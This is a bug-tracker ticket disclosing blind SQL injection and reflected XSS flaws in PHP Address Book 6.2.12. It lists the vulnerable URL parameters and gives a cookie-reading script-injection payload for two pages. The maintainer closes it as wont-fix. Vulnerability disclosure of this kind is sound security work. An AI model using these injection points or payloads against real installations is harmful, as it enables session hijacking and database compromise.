#7 PHP Address Book 6.2.12 Multiple security vulnerabilities

v1.0_(example)
wont-fix
nobody
5
2012-10-28
2012-03-03
Anonymous
No

Hi,

I`ve found some xss and sql-injection vulnerabilities in PHP Address Book 6.2.12:

// (Blind) SQL-Injection
http://[target]/addressbookv6.2.12/edit.php?id=[sql-injection]
http://[target]/addressbookv6.2.12/group.php?add=Add to&group=1&selected%5b%5d=132&to_group=[sql-injection]
http://[target]/addressbookv6.2.12/vcard.php?id=[sql-injection]

// XSS
http://[target]/addressbookv6.2.12/preferences.php?from='"</script><script>alert(document.cookie)</script>
http://[target]/addressbookv6.2.12/index.php?group='"</script><script>alert(document.cookie)</script>

Best regards,
sschurtz

Discussion

  • chatelao

    chatelao - 2012-10-28

    See v7.0.0 Bugs.

     
  • chatelao

    chatelao - 2012-10-28
    • status: open --> wont-fix
    • milestone: --> v1.0_(example)
     


Anonymous

Cancel  Add attachments





Get latest updates about Open Source Projects, Conferences and News.

Sign up for the SourceForge newsletter:





No, thanks